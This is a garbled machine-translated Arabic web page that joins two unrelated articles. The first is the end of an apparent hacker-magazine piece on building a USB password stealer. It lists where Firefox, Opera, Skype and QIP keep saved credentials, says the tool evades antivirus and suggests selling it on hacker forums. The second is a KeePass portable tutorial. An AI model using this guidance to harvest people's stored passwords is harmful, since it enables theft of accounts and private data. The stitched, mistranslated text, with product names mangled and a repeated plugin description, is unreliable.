جميع هذه الملفات موجودة في المستندات المعروفة بالفعل والإعدادات \\٪ اسم المستخدم٪ \\ بيانات التطبيق \\ Mozilla \\ Firefox \\ Profile \\٪ اسم الملف الشخصي٪.
الأوبرا.
الأوبرا. - المتصفح، الذي تحظى بشعبية كبيرة بين المستخدمين الروس. بطبيعة الحال، لا يمكننا تركها دون الاهتمام. لذلك، مع الأوبرا الوضع هو نفسه تقريبا كما هو الحال مع فايرفوكس. يتم تخزين جميع كلمات المرور المخزنة في المتصفح في المستند والإعدادات \\٪ اسم المستخدم٪ \\ Application Data \\ Opera \\ Profile في ملف Wand.dat. اتضح، عند اكتشاف الأوبرا، سنصرف وكذلك في حالة ثعلب النار..
سكايب.
شعبية Skype تنمو كل يوم. يستخدم الكثير منها كوسيلة لإجراء مكالمات، ولكن لمحادثة بانال مريحة. جميع البيانات الحميمة، كما يجب أن تتوقع، موجودة في ملف تعريف المستخدم (هناك، حيث يخزنون أوبراهم أو FF). للحصول على "خصخصة" سيتعين عليك نسخ ملف تعريف المستخدم من المستند والإعدادات \\٪ اسم المستخدم٪ \\ Application Data \\ Skype \\ and تصدير فرع التسجيل - HKEY_CURRENT_USER \\ Software \\ Skype \\ Proteatedorage.
كيب.
مثل معظم البرامج الموصوفة سابقا، QIP جميع مخازن كلمات المرور المحفوظة في تطبيق بيانات التطبيق \\ QP.
الانتهاء من النسخ
التكنولوجيا .NET تبسيط الولايات المتحدة بقوة، ونتيجة لذلك تم تخفيض الترميز بأكمله إلى دعوة إلى عدة طرق. بالطبع، بالطبع، يمكنك أن تقول أنه ليس رائعا وأن هذه الأشياء أكثر كفاءة للكتابة على Winapi أو ASM "E. في شيء ما، وأنا أتفق معك، ولكن مع الأخذ في الاعتبار، على Winapi، وعلاوة على ذلك، على ASME لكتابة هذا البرنامج حتى لا تتمكن بسرعة بسرعة. بينما يكتب الآخرون رمز الكيلومتر، سنقوم بجمع الحصاد. حظا سعيدا في البرمجة، وإذا كان لديك أي أسئلة، - أطلب منك، اكتب على الصابون.
لا تنسى أن العديد من المستخدمين يخزنون معلومات سرية في مجلد "المستندات". بحد أدنى، قد تكون هناك مستندات عمل مثيرة للاهتمام، وأحيانا ملفات كاملة مع كلمات المرور. أنا في وقتي (على العمل السابق) اكتشفت ملف منسق منظم مع كلمات مرور للعملاء على مقصورة.
كصديق حقيقي، يجب أن تساعد كل هؤلاء الأشخاص ذوي الاحتياطي من معلوماتهم السرية.
على العديد من منتديات القراصنة، العديد من الإعلانات لبيع البرمجيات من هذا النوع. أسعار مختلفة - من 10 دولارات إلى 100 دولاروبعد تحسين الأمثلة التي تم النظر فيها في المقال، يمكنك كسب قشرة الخبز الأسود مع الكافيار. أكرر، الشيء الرئيسي للذهاب إلى القضية بشكل خلاق، وكل شيء سيعمل بالتأكيد. مرة أخرى، لم يتم اكتشاف مكافحة الفيروسات؛).
تحذير!
نحن نستخدم هذا البرنامج حصرا للنسخ الاحتياطي في الوقت المناسب لمحتويات محركات الفلاش إلى القرص وكلمات مرور النسخ الاحتياطي على محرك أقراص فلاش USB. وما رأيك؟ الاستخدام غير المشروع لمثل هذا البرنامج يعاقب عليه!
أصبحت العديد من الشركات، بما في ذلك Sony و Adobe، بالفعل ضحايا للمتسللين الذين سرقوا ملايين كلمات المرور وبيانات المستخدم الأخرى. أظهر تحليل لهذه المعلومات أن العديد من المستخدمين يستخدمون غالبا إما كلمات مرور غير موثوق بها مثل "123456"، أو نفس كلمة المرور للعديد من الخدمات. إنه يسهل للغاية المتسللين مهمتهم، وفي الوقت نفسه، يمكن فهم مثل هذه الإهمال: من هو قادر على تذكر أكثر من عشرات كلمات مرور صعبة؟
يمكن أن يكون الحل البسيط قطعة ورقية لصقها تحت لوحة المفاتيح. لا يمكن لأي قراصنة تناوله عنده، لكنك سيتعين عليك مراقبة الأشخاص المستمرين بالقرب من جهاز الكمبيوتر الخاص بك. ومن هذه الورقة لا يوجد أي فائدة إذا كنت ترغب في إدخال حسابك مع كمبيوتر شخص آخر.
حفار الحرة 2 أداة المحمولة تحل هذه المعضلة. للعمل، ستحتاج فقط إلى محرك أقراص فلاش USB فقط مع 10 ميغابايت من المساحة الحرة التي قمت بتثبيتها البرنامج المساعدوبعد في المستقبل، ستحتاج إلى تذكر كلمة مرور واحدة فقط - من المنطقة المحمية لمحرك فلاش. بعد كل شيء، يحتفظ ببيانات محبرة لإدخال خدمات الويب الخاصة بك في شكل بنك بيانات مشفر محمي بكلمة المرور الرئيسية.
Troyans، أخذ كلمات المرور، لن تكون قادرة على رفع أي شيء. وبما أنك لم تعد بحاجة إلى الاستمرار في الذاكرة العشرات من كلمات المرور، فيمكنك استخدام خدمة ويب جديدة جديدة حقا كلمة مرور موثوقةوبعد الآن سنخبرك بالتفصيل كيفية استخدام حفانة.
كيف افعلها
1 تثبيت كلمة المرور آمنة
تثبيت كلمة المرور آمنة
أدخل محرك أقراص فلاش USB في الكمبيوتر، وإنشاء مجلد جديد عليه ونسخ محتويات الأرشيف مع برنامج Keepass هناك. قم بتشغيل برنامج Keepass.exe. بعد البدء، تنشيط البحث التلقائي تحديثات بالنقر فوق النافذة المنبثقة إلى "تمكين". ثم حدد "عرض | تغيير اللغة وانقر فوق "احصل على المزيد من اللغات".
قم بتنزيل ملف اللغة الروسي من الموقع الافتتاحي بالنقر فوق «الروسية | 2.25+. " قم بفك تثبيت محتويات الأرشيف إلى محرك أقراص USB. إعادة النقر فوق "عرض | تغيير اللغة، "حدد" الروسية "وأعد تشغيل eftass عن طريق الضغط على زر" نعم ".
2 إنشاء قاعدة بيانات كلمة المرور الجديدة
يخلق قاعدة جديدة كلمات المرور
حدد "ملف | جديد "وتحديد محرك أقراص USB كتخزين كلمة مرور. في النافذة التالية، سيطالبك البرنامج بتعيين كلمة المرور الرئيسية. سيحتاج إلى إدخال كل مرة يبدأ keepass.
3 تنشيط الوضع المحمي
تنشيط الوضع المحمي
إلى Trojan لا يمكن حساب كلمة المرور الخاصة بك لحقوقك، يجب عليك استخدام وضع البرنامج المحمي، مشابه ل UAC في Windows 7. للقيام بذلك، انتقل إلى Keepass to "Service | الإعدادات | الأمن "، انتقل في أسفل النافذة وتحقق من المربع الموجود بجوار" أدخل كلمة المرور الرئيسية في وضع آمن ".
4 ملء كلمات مرور قاعدة البيانات
ملء كلمات مرور قاعدة البيانات
حفانة يمكن فرز كلمات المرور من قبل مجموعات. بشكل افتراضي، لديك مثل هذه المجموعات ك "OS" أو "الإنترنت" في كلمة مرورك المصرفية الجديدة. لنصنع او لنبتكر رقم قياسي جديد، حدد المجموعة المناسبة (أو إنشاء واحدة جديدة)، انقر فوق المنطقة البيضاء إلى زر الماوس الأيمن الموجود على اليمين ثم - عن طريق "إضافة سجل".
املأ جميع الحقول وانقر فوق موافق. نظرا لأنك لم تعد بحاجة إلى تذكر كلمات المرور لإدخال كل حساب، فيمكنك تعيين جديد وأكثر تعقيدا، والتي يمكن إنشاؤها، على سبيل المثال، على موقع Passwort-Generator.com.
5 استخدام التفويض التلقائي
إذا كنت ترغب في تسجيل الدخول باستخدام Endass، افتح المجموعة التي يتم فيها تخزين كلمة المرور المناسبة. انقر بزر الماوس الأيمن فوق الإدخال المناسب إلى تخزين كلمة مرور Keepass وحدد "بدء الاستقراء" في القائمة. بعد ذلك، سيقوم البرنامج بنقل بيانات المستعرض الخاص بك، وسيقوم المتصفح بفتح نافذة جديدة حيث ستدخل حسابك.
يرجى ملاحظة أنه في حقل "URL"، يجب عليك إدخال عنوان URL الذي تدخل فيه عادة في المستعرض للحصول على إذن، وإلا فلن تعمل تلقائيا في إدخال كلمة المرور من خلال Keepass.
6 توسيع قدرات حفانة
توسيع قدرات حفانة
إذا كنت ترغب في توسيع وظائف Keepass، انتقل إلى "خدمة | وحدات | الوحدات النمطية الثابتة "، وبعد ذلك سيتم إعادة توجيهك إلى الموقع ملحقات مفيدة (يمكن العثور على توصياتنا في الجدول أعلاه). انقر الآن على اسم البرنامج المساعد، قم بتنزيله وتفكيكه على محرك أقراص Flash.
تشغيل حفانة مرة أخرى والذهاب إلى "الخدمة | وحدات. في الأسفل، ستظهر قائمة بالمكونات الإضافية المتاحة (يمكن تكوين بعضها).
أفضل ملحقات لحماية
تزويد Sapper الخاص بك مع كلمات المرور ميزات إضافية، مثل وظيفة النسخ الاحتياطي أو نقل كلمة المرور للهواتف المحمولة.
اسم |
وصف |
| نسخه الاحتياطيه لقاعدة البيانات. | يحدد حماية المصرفية لكلمات المرور في حالة سرقة محرك أقراص USB أو فقدها. |
| تشفير توفي. | |
| كيغال. | يضيف خوارزمية الترميز التي يكاد يكون من المستحيل الاختراق؛ لاحظ أنه بسبب هذا، ستعمل حفانة أبطأ. |
| Keyexchanger. | يضيف خوارزمية الترميز التي يكاد يكون من المستحيل الاختراق؛ لاحظ أنه بسبب هذا، ستعمل حفانة أبطأ. |
| كيوفورم | يفتح المواقع المفضلة لديك عن طريق الضغط على الزر وتحقيق بيانات التسجيل الخاصة بك تلقائيا. |